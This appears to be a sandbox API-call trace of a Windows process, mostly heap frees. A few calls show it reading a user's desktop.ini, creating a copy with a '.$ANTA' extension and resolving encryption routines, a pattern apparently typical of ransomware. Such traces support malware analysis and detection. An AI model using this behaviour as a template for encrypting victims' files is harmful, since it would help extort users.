HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0076.550] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0076.550] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0076.551] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.551] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0076.551] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.551] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0076.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0076.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0076.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.551] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0076.552] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.552] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0076.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0076.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.553] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0076.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0076.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.554] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0076.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0076.554] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0076.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.558] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0076.558] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x192, lpOverlapped=0x0) returned 1 [0076.586] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0076.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8d00 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.589] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8d00 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.589] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.590] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.590] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.590] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0076.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.591] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.591] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 